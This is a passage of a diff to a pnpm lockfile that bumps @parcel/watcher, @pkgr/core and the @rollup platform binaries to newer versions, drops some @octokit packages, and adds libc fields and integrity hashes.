-      '@octokit/core': '5'
-
-  '@octokit/plugin-rest-endpoint-methods@10.4.1':
-    resolution: {integrity: sha512-xV1b+ceKV9KytQe3zCVqjg+8GTGfDYwaT1ATU5isiUyVtlVAO3HNdzpS4sr4GBx4hxQ46s7ITtZrAsxG22+rVg==}
-    engines: {node: '>= 18'}
-    peerDependencies:
-      '@octokit/core': '5'
-
-  '@octokit/request-error@5.1.1':
-    resolution: {integrity: sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==}
-    engines: {node: '>= 18'}
-
-  '@octokit/request@8.4.1':
-    resolution: {integrity: sha512-qnB2+SY3hkCmBxZsR/MPCybNmbJe4KAlfWErXq+rBKkQJlbjdJeS85VI9r8UqeLYLvnAenU8Q1okM/0MBsAGXw==}
-    engines: {node: '>= 18'}
-
-  '@octokit/types@12.6.0':
-    resolution: {integrity: sha512-1rhSOfRa6H9w4YwK0yrf5faDaDTb+yLyBUKOCV4xtCDB5VmIPqd/v9yr9o6SAzOAlRxMiRiCic6JVM1/kunVkw==}
-
-  '@octokit/types@13.10.0':
-    resolution: {integrity: sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==}
-
-  '@parcel/watcher-android-arm64@2.5.1':
-    resolution: {integrity: sha512-KF8+j9nNbUN8vzOFDpRMsaKBHZ/mcjEjMToVMJOhTozkDonQFFrRcfdLWn6yWKCmJKmdVxSgHiYvTCef4/qcBA==}
+  '@parcel/watcher-android-arm64@2.6.0':
+    resolution: {integrity: sha512-trgpLSCKRC/huFjXX/Smh+0sWe4+YtKfktIToiMl59ghz7z+qkH6kMvNnUbLyRs9N11t8l4svSCs1+5B3rOAhA==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm64]
     os: [android]
 
-  '@parcel/watcher-darwin-arm64@2.5.1':
-    resolution: {integrity: sha512-eAzPv5osDmZyBhou8PoF4i6RQXAfeKL9tjb3QzYuccXFMQU0ruIc/POh30ePnaOyD1UXdlKguHBmsTs53tVoPw==}
+  '@parcel/watcher-darwin-arm64@2.6.0':
+    resolution: {integrity: sha512-Y3QV0gl7Q1zbfueunkWIERICbEojQFCgpyG7YqOGNFLsckXyI1xu9mAIUpKY9QBYzBtSkN8dBPwd3yiAO9ovMw==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm64]
     os: [darwin]
 
-  '@parcel/watcher-darwin-x64@2.5.1':
-    resolution: {integrity: sha512-1ZXDthrnNmwv10A0/3AJNZ9JGlzrF82i3gNQcWOzd7nJ8aj+ILyW1MTxVk35Db0u91oD5Nlk9MBiujMlwmeXZg==}
+  '@parcel/watcher-darwin-x64@2.6.0':
+    resolution: {integrity: sha512-Ohv6OpzhUfKYD7Beb8kDvG0jbIxORCYY1JRdZnaBtnjjkJxgD7ZVL0nw2sCYd0yTMKTvz3nnTnOF3cDifK+kvw==}
     engines: {node: '>= 10.0.0'}
     cpu: [x64]
     os: [darwin]
 
-  '@parcel/watcher-freebsd-x64@2.5.1':
-    resolution: {integrity: sha512-SI4eljM7Flp9yPuKi8W0ird8TI/JK6CSxju3NojVI6BjHsTyK7zxA9urjVjEKJ5MBYC+bLmMcbAWlZ+rFkLpJQ==}
+  '@parcel/watcher-freebsd-x64@2.6.0':
+    resolution: {integrity: sha512-5HmXvDgs8VK+74jF9y9/2FE3/OnlcKmc56tjmSrEuZjpSZOGL+fvAu+HKJBdPs9uwoP2hE6TlSUpXZ/C5jUFmQ==}
     engines: {node: '>= 10.0.0'}
     cpu: [x64]
     os: [freebsd]
 
-  '@parcel/watcher-linux-arm-glibc@2.5.1':
-    resolution: {integrity: sha512-RCdZlEyTs8geyBkkcnPWvtXLY44BCeZKmGYRtSgtwwnHR4dxfHRG3gR99XdMEdQ7KeiDdasJwwvNSF5jKtDwdA==}
+  '@parcel/watcher-linux-arm-glibc@2.6.0':
+    resolution: {integrity: sha512-Ps/hui3A+vMbjdqlqAowK2ZL8+BO8dBjxeWXj6npTBs3jx4wWmbPpaLuqwrQrSqIVMCnpWo238bJ1U37GhQOYg==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm]
     os: [linux]
+    libc: [glibc]
 
-  '@parcel/watcher-linux-arm-musl@2.5.1':
-    resolution: {integrity: sha512-6E+m/Mm1t1yhB8X412stiKFG3XykmgdIOqhjWj+VL8oHkKABfu/gjFj8DvLrYVHSBNC+/u5PeNrujiSQ1zwd1Q==}
+  '@parcel/watcher-linux-arm-musl@2.6.0':
+    resolution: {integrity: sha512-9c6AUHgHoG+IY88MRIHupztQiQnrbqHYQjkM2btA+Bf/wQnQMuiD0Wfk1EVv3TlNT3x41uU71rn6E4xh/+zvkw==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm]
     os: [linux]
+    libc: [musl]
 
-  '@parcel/watcher-linux-arm64-glibc@2.5.1':
-    resolution: {integrity: sha512-LrGp+f02yU3BN9A+DGuY3v3bmnFUggAITBGriZHUREfNEzZh/GO06FF5u2kx8x+GBEUYfyTGamol4j3m9ANe8w==}
+  '@parcel/watcher-linux-arm64-glibc@2.6.0':
+    resolution: {integrity: sha512-yHRqS2owEXe6Hic9z6Mh1ECsCd+ODVOGvZDyciqRd21+v+o+DnXMOrw50DSpIG2sb8GPEaPPmfeCAWKPJdq46g==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm64]
     os: [linux]
+    libc: [glibc]
 
-  '@parcel/watcher-linux-arm64-musl@2.5.1':
-    resolution: {integrity: sha512-cFOjABi92pMYRXS7AcQv9/M1YuKRw8SZniCDw0ssQb/noPkRzA+HBDkwmyOJYp5wXcsTrhxO0zq1U11cK9jsFg==}
+  '@parcel/watcher-linux-arm64-musl@2.6.0':
+    resolution: {integrity: sha512-WhB2e/V7rqdHHWZusBSPuy5Ei8S6lSz6FE5TKKQz5h3a0O+C+mhY7vxU9b/stqvMb8beLnPY82ZrFTLKs+SrKA==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm64]
     os: [linux]
+    libc: [musl]
 
-  '@parcel/watcher-linux-x64-glibc@2.5.1':
-    resolution: {integrity: sha512-GcESn8NZySmfwlTsIur+49yDqSny2IhPeZfXunQi48DMugKeZ7uy1FX83pO0X22sHntJ4Ub+9k34XQCX+oHt2A==}
+  '@parcel/watcher-linux-x64-glibc@2.6.0':
+    resolution: {integrity: sha512-ulGE6x6Oz6iAwg75T8YQSoguBWasniIbX+QWpaYPcCnDOpdWX3k+4xbEYPZVLxOuoJI+svJJPD3sEj8G7lrQ3A==}
     engines: {node: '>= 10.0.0'}
     cpu: [x64]
     os: [linux]
+    libc: [glibc]
 
-  '@parcel/watcher-linux-x64-musl@2.5.1':
-    resolution: {integrity: sha512-n0E2EQbatQ3bXhcH2D1XIAANAcTZkQICBPVaxMeaCVBtOpBZpWJuf7LwyWPSBDITb7In8mqQgJ7gH8CILCURXg==}
+  '@parcel/watcher-linux-x64-musl@2.6.0':
+    resolution: {integrity: sha512-tkBYKt7YQrjIJWYDnto2YgO8MRkjlMTSNoRHzsXinBqbLdeOM3L32wPZJvIZxqaLMfSlS/4sUjH/6STVP/XDLw==}
     engines: {node: '>= 10.0.0'}
     cpu: [x64]
     os: [linux]
+    libc: [musl]
 
-  '@parcel/watcher-win32-arm64@2.5.1':
-    resolution: {integrity: sha512-RFzklRvmc3PkjKjry3hLF9wD7ppR4AKcWNzH7kXR7GUe0Igb3Nz8fyPwtZCSquGrhU5HhUNDr/mKBqj7tqA2Vw==}
+  '@parcel/watcher-win32-arm64@2.6.0':
+    resolution: {integrity: sha512-gIZAP23jaHjGWasY/TY6yL7NHFClf0Ga7FN+iINvk+KN94rhm94lYZhFsbYFNcA04/onvGD9kKmiJLJB2HbNwQ==}
     engines: {node: '>= 10.0.0'}
     cpu: [arm64]
     os: [win32]
 
-  '@parcel/watcher-win32-ia32@2.5.1':
-    resolution: {integrity: sha512-c2KkcVN+NJmuA7CGlaGD1qJh1cLfDnQsHjE89E60vUEMlqduHGCdCLJCID5geFVM0dOtA3ZiIO8BoEQmzQVfpQ==}
-    engines: {node: '>= 10.0.0'}
-    cpu: [ia32]
-    os: [win32]
-
-  '@parcel/watcher-win32-x64@2.5.1':
-    resolution: {integrity: sha512-9lHBdJITeNR++EvSQVUcaZoWupyHfXe1jZvGZ06O/5MflPcuPLtEphScIBL+AiCWBO46tDSHzWyD0uDmmZqsgA==}
+  '@parcel/watcher-win32-x64@2.6.0':
+    resolution: {integrity: sha512-cA+/pXV2YkfxlIcXOQ5fSWqAzzPyD78/x5qbK/I0vUkrlYHA8TIz+MXjAbGouguKVSI4bOmkTSJ1/poVSsgt+A==}
     engines: {node: '>= 10.0.0'}
     cpu: [x64]
     os: [win32]
 
-  '@parcel/watcher@2.5.1':
-    resolution: {integrity: sha512-dfUnCxiN9H4ap84DvD2ubjw+3vUNpstxa0TneY/Paat8a3R4uQZDLSvWjmznAY/DoahqTHl9V46HF/Zs3F29pg==}
+  '@parcel/watcher@2.6.0':
+    resolution: {integrity: sha512-7FNeNl8NCE7aINx7WXiKQrPYZWC/hvrTsmk6zmxbI7LTXE7hVek/n8AfVgpe2y82zl3w0HvCHN0bVKMBoJcC0w==}
     engines: {node: '>= 10.0.0'}
 
-  '@pkgjs/parseargs@0.11.0':
-    resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==}
-    engines: {node: '>=14'}
-
-  '@pkgr/core@0.2.9':
-    resolution: {integrity: sha512-QNqXyfVS2wm9hweSYD2O7F0G06uurj9kZ96TRQE5Y9hU7+tgdZwIkbAKc5Ocy1HxEY2kuDQa6cQ1WRs/O5LFKA==}
-    engines: {node: ^12.20.0 || ^14.18.0 || >=16.0.0}
+  '@pkgr/core@0.3.6':
+    resolution: {integrity: sha512-SEeaJLb3qBNF/OaXnaR1NmmBbFYk1zC0ZH/52fATcRPLFg/p791YrcyFFy44Bo9sLaGuSuLp5Q6axbb/O+v/RA==}
+    engines: {node: ^14.18.0 || >=16.0.0}
 
   '@pnpm/config.env-replace@1.1.0':
     resolution: {integrity: sha512-htyl8TWnKL7K/ESFa1oW2UB5lVDxuF5DpM7tBi6Hu2LNL3mWkIzNLG6N4zoCUP1lCKNxWy/3iu8mS8MvToGd6w==}
@@ -917,210 +742,146 @@ packages:
       rollup:
         optional: true
 
-  '@rollup/rollup-android-arm-eabi@4.34.6':
-    resolution: {integrity: sha512-+GcCXtOQoWuC7hhX1P00LqjjIiS/iOouHXhMdiDSnq/1DGTox4SpUvO52Xm+div6+106r+TcvOeo/cxvyEyTgg==}
+  '@rollup/rollup-android-arm-eabi@4.62.2':
+    resolution: {integrity: sha512-6o7ZLZK+BeenkZCFNDXqpbjw9bD6nuWonvS/lwQJp7NoVVxm6p3qE7qQ5jGuBjiFsgvqjD8mZAU5oWxTmbOeOg==}
     cpu: [arm]
     os: [android]
 
-  '@rollup/rollup-android-arm-eabi@4.52.5':
-    resolution: {integrity: sha512-8c1vW4ocv3UOMp9K+gToY5zL2XiiVw3k7f1ksf4yO1FlDFQ1C2u72iACFnSOceJFsWskc2WZNqeRhFRPzv+wtQ==}
-    cpu: [arm]
-    os: [android]
-
-  '@rollup/rollup-android-arm64@4.34.6':
-    resolution: {integrity: sha512-E8+2qCIjciYUnCa1AiVF1BkRgqIGW9KzJeesQqVfyRITGQN+dFuoivO0hnro1DjT74wXLRZ7QF8MIbz+luGaJA==}
+  '@rollup/rollup-android-arm64@4.62.2':
+    resolution: {integrity: sha512-BaH7BllCACHoH1LguOU56UItGfUWjujlO65kS9LAodViaN4bwIKd7oeW/ZHJ/4ljr/7MIiENnNy3HJ0zXv8Zkw==}
     cpu: [arm64]
     os: [android]
 
-  '@rollup/rollup-android-arm64@4.52.5':
-    resolution: {integrity: sha512-mQGfsIEFcu21mvqkEKKu2dYmtuSZOBMmAl5CFlPGLY94Vlcm+zWApK7F/eocsNzp8tKmbeBP8yXyAbx0XHsFNA==}
-    cpu: [arm64]
-    os: [android]
-
-  '@rollup/rollup-darwin-arm64@4.34.6':
-    resolution: {integrity: sha512-z9Ib+OzqN3DZEjX7PDQMHEhtF+t6Mi2z/ueChQPLS/qUMKY7Ybn5A2ggFoKRNRh1q1T03YTQfBTQCJZiepESAg==}
+  '@rollup/rollup-darwin-arm64@4.62.2':
+    resolution: {integrity: sha512-v39RCCvj4He82I9sFmk+M1VZ0PLM9sfsLVikjfx2hYBNALhrrOR2D3JjQA6AhlaSOgcR+RzrKY7e1+bT6SUO/A==}
     cpu: [arm64]
     os: [darwin]
 
-  '@rollup/rollup-darwin-arm64@4.52.5':
-    resolution: {integrity: sha512-takF3CR71mCAGA+v794QUZ0b6ZSrgJkArC+gUiG6LB6TQty9T0Mqh3m2ImRBOxS2IeYBo4lKWIieSvnEk2OQWA==}
-    cpu: [arm64]
-    os: [darwin]
-
-  '@rollup/rollup-darwin-x64@4.34.6':
-    resolution: {integrity: sha512-PShKVY4u0FDAR7jskyFIYVyHEPCPnIQY8s5OcXkdU8mz3Y7eXDJPdyM/ZWjkYdR2m0izD9HHWA8sGcXn+Qrsyg==}
+  '@rollup/rollup-darwin-x64@4.62.2':
+    resolution: {integrity: sha512-yl0y2vq3S3lHeuXhEdss6TWfKW8vkujImO12tn4ZkG/4oghr09LvdYm2RElVjokTQiUvDUGXLGsYeLqUMCKpGA==}
     cpu: [x64]
     os: [darwin]
 
-  '@rollup/rollup-darwin-x64@4.52.5':
-    resolution: {integrity: sha512-W901Pla8Ya95WpxDn//VF9K9u2JbocwV/v75TE0YIHNTbhqUTv9w4VuQ9MaWlNOkkEfFwkdNhXgcLqPSmHy0fA==}
-    cpu: [x64]
-    os: [darwin]
-
-  '@rollup/rollup-freebsd-arm64@4.34.6':
-    resolution: {integrity: sha512-YSwyOqlDAdKqs0iKuqvRHLN4SrD2TiswfoLfvYXseKbL47ht1grQpq46MSiQAx6rQEN8o8URtpXARCpqabqxGQ==}
+  '@rollup/rollup-freebsd-arm64@4.62.2':
+    resolution: {integrity: sha512-tT4pvt4qXD+vEoezupCWi+a1F0vvDiksiHc+PxRlYTOH1I6/X4id9jPxTP+Fg+545euaFT1jJVs4CEdHZAU1vw==}
     cpu: [arm64]
     os: [freebsd]
 
-  '@rollup/rollup-freebsd-arm64@4.52.5':
-    resolution: {integrity: sha512-QofO7i7JycsYOWxe0GFqhLmF6l1TqBswJMvICnRUjqCx8b47MTo46W8AoeQwiokAx3zVryVnxtBMcGcnX12LvA==}
-    cpu: [arm64]
-    os: [freebsd]
-
-  '@rollup/rollup-freebsd-x64@4.34.6':
-    resolution: {integrity: sha512-HEP4CgPAY1RxXwwL5sPFv6BBM3tVeLnshF03HMhJYCNc6kvSqBgTMmsEjb72RkZBAWIqiPUyF1JpEBv5XT9wKQ==}
+  '@rollup/rollup-freebsd-x64@4.62.2':
+    resolution: {integrity: sha512-6nU5F2wCW+qvCBhTn1pdIU3bzsIoF7EUwsCDRxilWGprQR6yd508YnH9+OKFCwpfS8pjZqDUmnCAr7exax0XCg==}
     cpu: [x64]
     os: [freebsd]
 
-  '@rollup/rollup-freebsd-x64@4.52.5':
-    resolution: {integrity: sha512-jr21b/99ew8ujZubPo9skbrItHEIE50WdV86cdSoRkKtmWa+DDr6fu2c/xyRT0F/WazZpam6kk7IHBerSL7LDQ==}
-    cpu: [x64]
-    os: [freebsd]
-
-  '@rollup/rollup-linux-arm-gnueabihf@4.34.6':
-    resolution: {integrity: sha512-88fSzjC5xeH9S2Vg3rPgXJULkHcLYMkh8faix8DX4h4TIAL65ekwuQMA/g2CXq8W+NJC43V6fUpYZNjaX3+IIg==}
+  '@rollup/rollup-linux-arm-gnueabihf@4.62.2':
+    resolution: {integrity: sha512-n1GJHPOvpIfhi3TmrCeh6S6URt9BFCt0KQE3qvexyGCTAKpR4Lg+eWvNZEqu7epxwus/8ElT3hacYEucm49SZg==}
     cpu: [arm]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-arm-gnueabihf@4.52.5':
-    resolution: {integrity: sha512-PsNAbcyv9CcecAUagQefwX8fQn9LQ4nZkpDboBOttmyffnInRy8R8dSg6hxxl2Re5QhHBf6FYIDhIj5v982ATQ==}
+  '@rollup/rollup-linux-arm-musleabihf@4.62.2':
+    resolution: {integrity: sha512-JqgflS8wEB+UXV/vS1RpRbifGBeN4D5lz8D8oOFbFZw4vedvdOgCFAjfBmIMdW3yL10XpQQ0Ambepw6MXrhOnA==}
     cpu: [arm]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-arm-musleabihf@4.34.6':
-    resolution: {integrity: sha512-wM4ztnutBqYFyvNeR7Av+reWI/enK9tDOTKNF+6Kk2Q96k9bwhDDOlnCUNRPvromlVXo04riSliMBs/Z7RteEg==}
-    cpu: [arm]
-    os: [linux]
-
-  '@rollup/rollup-linux-arm-musleabihf@4.52.5':
-    resolution: {integrity: sha512-Fw4tysRutyQc/wwkmcyoqFtJhh0u31K+Q6jYjeicsGJJ7bbEq8LwPWV/w0cnzOqR2m694/Af6hpFayLJZkG2VQ==}
-    cpu: [arm]
-    os: [linux]
-
-  '@rollup/rollup-linux-arm64-gnu@4.34.6':
-    resolution: {integrity: sha512-9RyprECbRa9zEjXLtvvshhw4CMrRa3K+0wcp3KME0zmBe1ILmvcVHnypZ/aIDXpRyfhSYSuN4EPdCCj5Du8FIA==}
+  '@rollup/rollup-linux-arm64-gnu@4.62.2':
+    resolution: {integrity: sha512-wnFJkogWvN4jm/hQRF2UBaeUmk20j5+DmHvoyWii2b8HJDyvz1MF2OU/6ynXt2KR63rbZLWkFpoytpdc/yBuSA==}
     cpu: [arm64]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-arm64-gnu@4.52.5':
-    resolution: {integrity: sha512-a+3wVnAYdQClOTlyapKmyI6BLPAFYs0JM8HRpgYZQO02rMR09ZcV9LbQB+NL6sljzG38869YqThrRnfPMCDtZg==}
+  '@rollup/rollup-linux-arm64-musl@4.62.2':
+    resolution: {integrity: sha512-HVu2bp0zhvJ8xHEV9+UUs7S90VadmBSY3LcIMvozbPo4AuMGDWlz3ymHLHZPX4hR67TKTt8Qp5PJ5RBg/i+RMQ==}
     cpu: [arm64]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-arm64-musl@4.34.6':
-    resolution: {integrity: sha512-qTmklhCTyaJSB05S+iSovfo++EwnIEZxHkzv5dep4qoszUMX5Ca4WM4zAVUMbfdviLgCSQOu5oU8YoGk1s6M9Q==}
-    cpu: [arm64]
-    os: [linux]
-
-  '@rollup/rollup-linux-arm64-musl@4.52.5':
-    resolution: {integrity: sha512-AvttBOMwO9Pcuuf7m9PkC1PUIKsfaAJ4AYhy944qeTJgQOqJYJ9oVl2nYgY7Rk0mkbsuOpCAYSs6wLYB2Xiw0Q==}
-    cpu: [arm64]
-    os: [linux]
-
-  '@rollup/rollup-linux-loong64-gnu@4.52.5':
-    resolution: {integrity: sha512-DkDk8pmXQV2wVrF6oq5tONK6UHLz/XcEVow4JTTerdeV1uqPeHxwcg7aFsfnSm9L+OO8WJsWotKM2JJPMWrQtA==}
+  '@rollup/rollup-linux-loong64-gnu@4.62.2':
+    resolution: {integrity: sha512-mQqqAV8QaoSgr9I2fKDLY2BAVvmKjWoGiu/cSYQonsLvtqwEn1E4QYfnCOcp5zoEqNhsDYin1s6jx/VJmrxlZg==}
     cpu: [loong64]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-loongarch64-gnu@4.34.6':
-    resolution: {integrity: sha512-4Qmkaps9yqmpjY5pvpkfOerYgKNUGzQpFxV6rnS7c/JfYbDSU0y6WpbbredB5cCpLFGJEqYX40WUmxMkwhWCjw==}
+  '@rollup/rollup-linux-loong64-musl@4.62.2':
+    resolution: {integrity: sha512-IxKLoxCQ2IWi6bT2akyDUBGsOImDKB+sPp4EsTmwFQ/fMwpCKm8uLSSgP/Kx/QYUgKis6SEZ5/Nlhup0DIA0PQ==}
     cpu: [loong64]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-powerpc64le-gnu@4.34.6':
-    resolution: {integrity: sha512-Zsrtux3PuaxuBTX/zHdLaFmcofWGzaWW1scwLU3ZbW/X+hSsFbz9wDIp6XvnT7pzYRl9MezWqEqKy7ssmDEnuQ==}
+  '@rollup/rollup-linux-ppc64-gnu@4.62.2':
+    resolution: {integrity: sha512-Mk5ha2RQSgyFfmYYLkBpPnUk8D8FriBxesO1u9O75X0mHgXL1UQcH5Itl2lurWL2tj0RxV9b9tJgipac0hRY9A==}
     cpu: [ppc64]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-ppc64-gnu@4.52.5':
-    resolution: {integrity: sha512-W/b9ZN/U9+hPQVvlGwjzi+Wy4xdoH2I8EjaCkMvzpI7wJUs8sWJ03Rq96jRnHkSrcHTpQe8h5Tg3ZzUPGauvAw==}
+  '@rollup/rollup-linux-ppc64-musl@4.62.2':
+    resolution: {integrity: sha512-CjvEnqJL/0/TQ3TXX3OPIJ/kmBellrWd4heXUmHeJlTnmwjKpSJzoehLaL6Xk0ZnMHBu9dZuFADNOrtjF4v+2w==}
     cpu: [ppc64]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-riscv64-gnu@4.34.6':
-    resolution: {integrity: sha512-aK+Zp+CRM55iPrlyKiU3/zyhgzWBxLVrw2mwiQSYJRobCURb781+XstzvA8Gkjg/hbdQFuDw44aUOxVQFycrAg==}
+  '@rollup/rollup-linux-riscv64-gnu@4.62.2':
+    resolution: {integrity: sha512-1SiZbzwdkaDURsew/tSOrooKiYy7EQGT6m8ufavAi9NEyQb/6VuIxFXAL1fqa4iZe3g4NbNk4P7J32z2tw5Mgg==}
     cpu: [riscv64]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-riscv64-gnu@4.52.5':
-    resolution: {integrity: sha512-sjQLr9BW7R/ZiXnQiWPkErNfLMkkWIoCz7YMn27HldKsADEKa5WYdobaa1hmN6slu9oWQbB6/jFpJ+P2IkVrmw==}
+  '@rollup/rollup-linux-riscv64-musl@4.62.2':
+    resolution: {integrity: sha512-nQts12zJ3NQRoE6uYljOH89v7szzLDvG2JD/vsX+vGXU8w/At1GowTZ5/7qeFQ8m7L55rpR8Okugnuo5bgjy2Q==}
     cpu: [riscv64]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-riscv64-musl@4.52.5':
-    resolution: {integrity: sha512-hq3jU/kGyjXWTvAh2awn8oHroCbrPm8JqM7RUpKjalIRWWXE01CQOf/tUNWNHjmbMHg/hmNCwc/Pz3k1T/j/Lg==}
-    cpu: [riscv64]
-    os: [linux]
-
-  '@rollup/rollup-linux-s390x-gnu@4.34.6':
-    resolution: {integrity: sha512-WoKLVrY9ogmaYPXwTH326+ErlCIgMmsoRSx6bO+l68YgJnlOXhygDYSZe/qbUJCSiCiZAQ+tKm88NcWuUXqOzw==}
+  '@rollup/rollup-linux-s390x-gnu@4.62.2':
+    resolution: {integrity: sha512-E9/ll019jhPIJgpzfZoIkBGhcz+kKNgVWYRY0zr9srBdPPFVpvOKW8VaJKUbeK+eZXyQF9ltME+Kk6affeaPgg==}
     cpu: [s390x]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-s390x-gnu@4.52.5':
-    resolution: {integrity: sha512-gn8kHOrku8D4NGHMK1Y7NA7INQTRdVOntt1OCYypZPRt6skGbddska44K8iocdpxHTMMNui5oH4elPH4QOLrFQ==}
-    cpu: [s390x]
-    os: [linux]
-
-  '@rollup/rollup-linux-x64-gnu@4.34.6':
-    resolution: {integrity: sha512-Sht4aFvmA4ToHd2vFzwMFaQCiYm2lDFho5rPcvPBT5pCdC+GwHG6CMch4GQfmWTQ1SwRKS0dhDYb54khSrjDWw==}
+  '@rollup/rollup-linux-x64-gnu@4.62.2':
+    resolution: {integrity: sha512-5BqxR/pshjey51iliyzTD5Xi3EN0aLmQ2lZ3lvefVV9c82BvrLo2/6OT55iifpWBufs6kdwWbuOKS841DrmK9A==}
     cpu: [x64]
     os: [linux]
+    libc: [glibc]
 
-  '@rollup/rollup-linux-x64-gnu@4.52.5':
-    resolution: {integrity: sha512-hXGLYpdhiNElzN770+H2nlx+jRog8TyynpTVzdlc6bndktjKWyZyiCsuDAlpd+j+W+WNqfcyAWz9HxxIGfZm1Q==}
+  '@rollup/rollup-linux-x64-musl@4.62.2':
+    resolution: {integrity: sha512-uNN83XxQrRAh/w0/pmAfibcwyb6YWt4gP+dpnQKPVJshAloQ785ii8CT8ZCIxkGg9opVsvAlGhFitSm6D1Jjpg==}
     cpu: [x64]
     os: [linux]
+    libc: [musl]
 
-  '@rollup/rollup-linux-x64-musl@4.34.6':
-    resolution: {integrity: sha512-zmmpOQh8vXc2QITsnCiODCDGXFC8LMi64+/oPpPx5qz3pqv0s6x46ps4xoycfUiVZps5PFn1gksZzo4RGTKT+A==}
+  '@rollup/rollup-openbsd-x64@4.62.2':
+    resolution: {integrity: sha512-srjEIxSH3LRnJN6THczDHWQplqEMFiAJrTab0msUryh9kwNpkICf3Ea6q6MN/2cZwRFUNx5w+h6Hpi4QuHS6Zg==}
     cpu: [x64]
-    os: [linux]
+    os: [openbsd]
 
-  '@rollup/rollup-linux-x64-musl@4.52.5':
-    resolution: {integrity: sha512-arCGIcuNKjBoKAXD+y7XomR9gY6Mw7HnFBv5Rw7wQRvwYLR7gBAgV7Mb2QTyjXfTveBNFAtPt46/36vV9STLNg==}
-    cpu: [x64]
-    os: [linux]
-
-  '@rollup/rollup-openharmony-arm64@4.52.5':
-    resolution: {integrity: sha512-QoFqB6+/9Rly/RiPjaomPLmR/13cgkIGfA40LHly9zcH1S0bN2HVFYk3a1eAyHQyjs3ZJYlXvIGtcCs5tko9Cw==}
+  '@rollup/rollup-openharmony-arm64@4.62.2':
+    resolution: {integrity: sha512-8hOJnxgbyObnCm5AlRA3A931xX19xq80RjVTKgJOvEKWqJruP/Uf12IbAOaDjjEXYRewwHLfmF0YRIdK3OwKWA==}
     cpu: [arm64]
     os: [openharmony]
 
-  '@rollup/rollup-win32-arm64-msvc@4.34.6':
-    resolution: {integrity: sha512-3/q1qUsO/tLqGBaD4uXsB6coVGB3usxw3qyeVb59aArCgedSF66MPdgRStUd7vbZOsko/CgVaY5fo2vkvPLWiA==}
+  '@rollup/rollup-win32-arm64-msvc@4.62.2':
+    resolution: {integrity: sha512-mmF4AY1i0hG/bLWUctUq59gtmgaSIRa3cu/A3JFRp/sCNEme2bgDEiDS22P9FbnJB8NJNF4jPJiSP5RHQpUTDg==}
     cpu: [arm64]
     os: [win32]
 
-  '@rollup/rollup-win32-arm64-msvc@4.52.5':
-    resolution: {integrity: sha512-w0cDWVR6MlTstla1cIfOGyl8+qb93FlAVutcor14Gf5Md5ap5ySfQ7R9S/NjNaMLSFdUnKGEasmVnu3lCMqB7w==}
-    cpu: [arm64]
-    os: [win32]
-
-  '@rollup/rollup-win32-ia32-msvc@4.34.6':
-    resolution: {integrity: sha512-oLHxuyywc6efdKVTxvc0135zPrRdtYVjtVD5GUm55I3ODxhU/PwkQFD97z16Xzxa1Fz0AEe4W/2hzRtd+IfpOA==}
+  '@rollup/rollup-win32-ia32-msvc@4.62.2':
+    resolution: {integrity: sha512-DZgkknc6jhHrk46V25vbAM0zZkyP0nSDkJB8/dRkLTxv470dOmWDqGoEJl/9A0dFfS7yE3REOwNDxpHwSLSt0Q==}
     cpu: [ia32]
     os: [win32]
 
-  '@rollup/rollup-win32-ia32-msvc@4.52.5':
-    resolution: {integrity: sha512-Aufdpzp7DpOTULJCuvzqcItSGDH73pF3ko/f+ckJhxQyHtp67rHw3HMNxoIdDMUITJESNE6a8uh4Lo4SLouOUg==}
-    cpu: [ia32]
-    os: [win32]
-
-  '@rollup/rollup-win32-x64-gnu@4.52.5':
-    resolution: {integrity: sha512-UGBUGPFp1vkj6p8wCRraqNhqwX/4kNQPS57BCFc8wYh0g94iVIW33wJtQAx3G7vrjjNtRaxiMUylM0ktp/TRSQ==}
+  '@rollup/rollup-win32-x64-gnu@4.62.2':
+    resolution: {integrity: sha512-T6xr6ucWSFto+VGajA8YH26LdpHRuP4YLHEKAtCWvJDOlnmWcDZVCI2Jmjr+IFHDlt2zRaTAKE4tfjTaWLgJBg==}
     cpu: [x64]
     os: [win32]
 
-  '@rollup/rollup-win32-x64-msvc@4.34.6':
-    resolution: {integrity: sha512-0PVwmgzZ8+TZ9oGBmdZoQVXflbvuwzN/HRclujpl4N/q3i+y0lqLw8n1bXA8ru3sApDjlmONaNAuYr38y1Kr9w==}
+  '@rollup/rollup-win32-x64-msvc@4.62.2':
+    resolution: {integrity: sha512-BfzEnDJOt9T8M989/lA37EcJgat01wLRnoi5dQf3QzOH7jzpqTAzdDbVfRljVr5r+jzKqpbHeyOfAaXxAd0PAA==}
     cpu: [x64]
     os: [win32]
 
-  '@rollup/rollup-win32-x64-msvc@4.52.5':
-    resolution: {integrity: sha512-TAcgQh2sSkykPRWLrdyy2AiceMckNf5loITqXxFI5VuQjS5tSuw3WlwdN8qv8vzjLAUTvYaH/mVjSFpbkFbpTg==}
-    cpu: [x64]
-    os: [win32]
+  '@standard-schema/spec@1.1.0':
+    resolution: {integrity: sha512-l2aFy5jALhniG5HgqrD6jXLi/rUWrKvqN/qJx6yoJsgKhblVd+iqqU4RCXavm/jPityDo5TCvKMnpjKnOriy0w==}
 
   '@types/chai@5.2.3':
